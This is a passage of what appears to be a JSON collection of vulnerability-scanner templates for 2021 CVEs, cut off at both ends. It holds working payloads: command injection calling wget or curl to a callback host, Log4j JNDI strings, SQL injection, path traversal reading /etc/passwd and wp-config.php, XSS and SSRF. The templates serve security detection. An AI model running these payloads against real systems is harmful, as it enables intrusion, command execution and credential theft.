Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["mec-events","text/csv"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24210","info":{"name":"WordPress PhastPress <1.111 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40542","info":{"name":"Opensis-Classic 8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28937","info":{"name":"Acexy Wireless-N WiFi Repeater REV 1.0 - Repeater Password Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Password Setting","addCfg('username'","addCfg('newpass'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27748","info":{"name":"IBM WebSphere HCL Digital Experience - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","internal":true,"words":["IBM WebSphere Portal"]}]},{"method":"GET","path":["{{BaseURL}}/docpicker/internal_proxy/http/oast.me","{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/oast.me"],"host-redirects":true,"max-redirects":2,"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-39322","info":{"name":"WordPress Easy Social Icons Plugin < 3.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-45382","info":{"name":"D-Link - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/ddns_check.ccp"],"body":"ccp_act=doCheck&ddnsHostName=;curl https://{{interactsh-url}};&ddnsUsername={{string1}}&ddnsPassword={{string2}}","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//interact.sh/%2f.."],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-24991","info":{"name":"WooCommerce PDF Invoices & Packing Slips WordPress Plugin < 2.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=wpo_wcpdf_options_page&section=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\" style=animation-name:rotation onanimationstart=alert(document.domain) x","WooCommerce PDF Invoices"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-38156","info":{"name":"Nagios XI < 5.8.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/ajaxhelper.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=updatedashboard&id=home&opts=&title=\"><script>alert(document.domain)</script>&background=&transparent=0&submitButton=Submit&nsp={{nsp_auth}}\n","GET /nagiosxi/dashboards/manage.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["data-title=\"\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header_5","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true},{"type":"regex","name":"nsp_auth","part":"body","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true}]}]},{"id":"CVE-2021-28149","info":{"name":"Hongdian H8922 3.0.5 Devices - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nCache-Control: max-age=0\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /log_download.cgi?type=../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","sshd:[x*]","root:[$]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36380","info":{"name":"Sunhillo SureLine <8.7.0.1.1 - Unauthenticated OS Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi/networkDiag.cgi HTTP/1.1\nHost: {{Hostname}}\n\ncommand=2&ipAddr=&dnsAddr=$(wget+http://{{interactsh-url}})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24387","info":{"name":"WordPress Pro Real Estate 7 Theme <3.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?ct_mobile_keyword&ct_keyword&ct_city&ct_zipcode&search-listings=true&ct_price_from&ct_price_to&ct_beds_plus&ct_baths_plus&ct_sqft_from&ct_sqft_to&ct_lotsize_from&ct_lotsize_to&ct_year_from&ct_year_to&ct_community=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&ct_mls&ct_brokerage=0&lat&lng HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","/wp-content/themes/realestate"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37216","info":{"name":"QSAN Storage Manager <3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http_header.php"],"headers":{"X-Trigger-XSS":"<script>alert(1)</script>"},"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(header), 'x-xss-protection')"]},{"type":"word","part":"body","words":["\"HTTP_X_TRIGGER_XSS\":\"<script>alert(1)</script>\""]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44228","info":{"name":"Apache Log4j2 Remote Code Injection","severity":"critical"},"requests":[{"raw":["GET /?x=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.uri.{{interactsh-url}}/a} HTTP/1.1\nHost: {{Hostname}}\n","GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accept.{{interactsh-url}}}\nAccept-Encoding: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptencoding.{{interactsh-url}}}\nAccept-Language: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.acceptlanguage.{{interactsh-url}}}\nAccess-Control-Request-Headers: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestheaders.{{interactsh-url}}}\nAccess-Control-Request-Method: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.accesscontrolrequestmethod.{{interactsh-url}}}\nAuthentication: Basic ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbasic.{{interactsh-url}}}\nAuthentication: Bearer ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.authenticationbearer.{{interactsh-url}}}\nCookie: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookiename.{{interactsh-url}}}=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.cookievalue.{{interactsh-url}}}\nLocation: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.location.{{interactsh-url}}}\nOrigin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.origin.{{interactsh-url}}}\nReferer: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.referer.{{interactsh-url}}}\nUpgrade-Insecure-Requests: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.upgradeinsecurerequests.{{interactsh-url}}}\nUser-Agent: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.useragent.{{interactsh-url}}}\nX-Api-Version: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xapiversion.{{interactsh-url}}}\nX-CSRF-Token: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xcsrftoken.{{interactsh-url}}}\nX-Druid-Comment: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xdruidcomment.{{interactsh-url}}}\nX-Forwarded-For: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xforwardedfor.{{interactsh-url}}}\nX-Origin: ${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.xorigin.{{interactsh-url}}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"regex","part":"interactsh_request","regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"]}],"extractors":[{"type":"kval","kval":null},{"type":"regex","group":2,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"},{"type":"regex","group":1,"regex":["\\d{6}\\.([a-zA-Z0-9\\.\\-]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.([a-z0-9]+)\\.\\w+"],"part":"interactsh_request"}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39226","info":{"name":"Grafana Snapshot - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/snapshots/:key"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"isSnapshot\":true"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43421","info":{"name":"Studio-42 elFinder <2.1.60 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1\nHost: {{Hostname}}\n","GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= 